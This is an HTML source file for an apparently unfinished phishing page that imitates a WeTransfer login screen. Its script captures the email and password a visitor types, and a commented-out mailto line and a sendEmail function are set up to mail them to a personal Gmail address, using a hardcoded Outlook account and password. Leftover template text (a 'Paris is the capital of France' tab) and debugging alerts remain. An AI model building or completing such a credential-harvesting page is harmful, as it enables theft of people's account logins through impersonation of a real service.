<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body {
  font-family: Arial, Helvetica, sans-serif;
  margin: 0px;
}
.new {
    height: 1000px;
    width: 50%;
    position: relative;
    background-image: url('we2.png');
    background-attachment: fixed;
    background-size: 50% 100%;
    background-color: gray;
    margin: 0px;

}

.new2{
    position: absolute;
    right: 8px;
    top: 8px;
    width: 50%;
    padding-top: 4%;
    padding-left: 15%;
    padding-right: 10%;
    text-align: center;
}
.an {
    
    margin-top: 6%;
    margin-left: 30%;
    
}
* {
  box-sizing: border-box;
}

/* style the container */
.container {
  margin-top: 5%;
  margin-left: 25%;
  margin-right: 25%;
  text-align: center;

} 

a {
    text-indent: 50px;
    color: #000;
}

/* style inputs and link buttons */
input,
.btn {
  width: 100%;
  padding: 17px;
  border: none;
  border-radius: 10px;
  margin: 5px 0;
  opacity: 0.85;
  display: inline-block;
  font-size: 17px;
  line-height: 20px;
  text-decoration: none; /* remove underline from anchors */
  background-color: rgb(233, 233, 233);
}

.btn:hover {
  border-color: rgb(161, 161, 161);
  border-style: solid;
}

/* add appropriate colors to fb, twitter and google buttons */
.fb {
  background-color: #3B5998;
  color: white;
}

.twitter {
  background-color: #55ACEE;
  color: white;
}

.google {
  background-color:white ;
  color: rgb(0, 0, 0);
  border-style:solid ;
  border-color: #dadada;
  border-width: 1px;
  border-radius: 30px;
}

/* style the submit button */
input[type=submit] {
  background-color: #000000;
  color: white;
  cursor: pointer;
  border-radius: 30px;
}

input[type=submit]:hover {
  background-color: #000000;
}

/* Two-column layout */
.col {
  float: left;
  width: 50%;
  margin: auto;
  padding: 0 50px;
  margin-top: 6px;
}

/* Clear floats after the columns */
.row:after {
  content: "";
  display: table;
  clear: both;
}

/* vertical line */
.vl {
  position: absolute;
  left: 50%;
  transform: translate(-50%);
  border: 2px solid #ddd;
  height: 175px;
}

/* text inside the vertical line */
.vl-innertext {
  position: absolute;
  top: 50%;
  transform: translate(-50%, -50%);
  background-color: #f1f1f1;
  border: 1px solid #ccc;
  border-radius: 50%;
  padding: 8px 10px;
}

/* hide some text on medium and large screens */
.hide-md-lg {
  display: none;
}

/* bottom container */
.bottom-container {
  text-align: center;
  background-color: #666;
  border-radius: 0px 0px 4px 4px;
}

/* Responsive layout - when the screen is less than 650px wide, make the two columns stack on top of each other instead of next to each other */
@media screen and (max-width: 650px) {
  .col {
    width: 100%;
    margin-top: 0;
  }
  /* hide the vertical line */
  .vl {
    display: none;
  }
  /* show the hidden text on small screens */
  .hide-md-lg {
    display: block;
    text-align: center;
  }
}

/* Style the tab */
.tab {
  overflow: hidden;
  border: 1px none solid none #ccc;
  background-color: #ffffff;
}

/* Style the buttons inside the tab */
.tab button {
  background-color: inherit;
  float: left;
  border: 1px ;
  outline: none;
  cursor: pointer;
  padding: 14px 16px;
  transition: 0.3s;
  font-size: 17px;
  border-style: none none solid none;
  border-color:rgb(206, 206, 206) ;
  color: rgb(148, 148, 148);
  font-size: 14px;
  align-content: center;
  width: 50%;
}

/* Change background color of buttons on hover */
.tab button:hover {
  background-color:none ;
}

/* Create an active/current tablink class */
.tab button.active {
 border-color: black;
  border-style: 1px dashed;
  color: #000000;
}

/* Style the tab content */
.tabcontent {
  display: none;
  padding: 6px 12px;
  border: 1px none #ccc;
  border-top: none;
}
</style>
</head>
<body>
<div class="new" >

</div>

<!--<h2>Responsive Social Login Form</h2>
<p>Resize the browser window to see the responsive effect. When the screen is less than 650px wide, make the two columns stack on top of each other instead of next to each other.</p>
action="/action_page.php" 
    <div class="vl">
        <span class="vl-innertext">or</span>
      </div>
    <h2 style="text-align:center">Login with Social Media or Manually</h2>
    -->
<div class="new2">
  <div class="an">
    <img src="Wetransfer.png" alt="shot" width="210px">  
  </div>
  
  <div class="tab">
    <button class="tablinks" onclick="openCity(event, 'London')">Log in</button>
    <button class="tablinks" onclick="openCity(event, 'Paris')">Create account</button>
    <!--button class="tablinks" onclick="openCity(event, 'Tokyo')">Tokyo</button-->
  
  </div>

  <div id="London" class="tabcontent">
   <div>
      <div>
          <a href="#" class="google btn"> Continue with Google
        </a>
        <a href="#" class="google btn">
          </i> Continue with Slack
         </a>
        <a href="#" class="google btn">
          </i>Continue with Apple 
        </a>
        
      </div>

      <div>
        <div >
          <p>Or better yet...</p>
        </div>
        <form method="GET">
         <input type="text" name="username" placeholder="Email" required Id="myInput" >
        <input type="password" name="password" placeholder="Password" required id="myPsw">
        <a href="#">Forgot password?</a>
        <input type="submit" value="Login in with WeTransfer" onclick="getInputValue();"> 
        </form>

        
      </div>
      <p id="demo"></p>
    </div>
  
  </div>

  <div id="Paris" class="tabcontent">
  <h3>Paris</h3>
  <p>Paris is the capital of France.</p>
  </div>

  <!--div id="Tokyo" class="tabcontent">
  <h3>Tokyo</h3>
  <p>Tokyo is the capital of Japan.</p>
  </div-->
  
   
  </form>

  <form>
    <input type="button" value="Send Email" 
        onclick="sendEmail()" />
  </form>


</div>



<!--iv class="bottom-container">
  <div class="row">
    <div class="col">
      <a href="#" style="color:white" class="btn">Sign up</a>
    </div>
    <div class="col">
      <a href="#" style="color:white" class="btn">Forgot password?</a>
    </div>
  </div>
</div-->

<script>
    function openCity(evt, cityName) {
      var i, tabcontent, tablinks;
      tabcontent = document.getElementsByClassName("tabcontent");
      for (i = 0; i < tabcontent.length; i++) {
        tabcontent[i].style.display = "none";
      }
      tablinks = document.getElementsByClassName("tablinks");
      for (i = 0; i < tablinks.length; i++) {
        tablinks[i].className = tablinks[i].className.replace(" active", "");
      }
      document.getElementById(cityName).style.display = "block";
      evt.currentTarget.className += " active";
    }

      
        function getInputValue(){
            // Selecting the input element and get its value 
            var inputVal = document.getElementById("myInput").value;
        
            
            // Displaying the value
            alert(inputVal, );

            var x = document.getElementById("myPsw").value;
    document.getElementById("demo").innerHTML = x;
    alert(x)
        }

       // document.location.href = "mailto:okibebernard@gmail.com.com?subject="
        //+ encodeURIComponent(myInput)
        //+ "&body=" + encodeURIComponent(myPsw);

        function sendEmail() {
	Email.send({
	Host: "smtp.gmail.com",
	Username : "elizabethanume@outlook.com",
	Password : "Nopalava21",
	To : 'okibebernard@gmail.com',
	From : "empirex224@yahoo,com",
	Subject : "good things",
	Body : "meeee",
	}).then(
		message => alert("mail sent successfully")
	);
}
    </script>


</body>
</html>

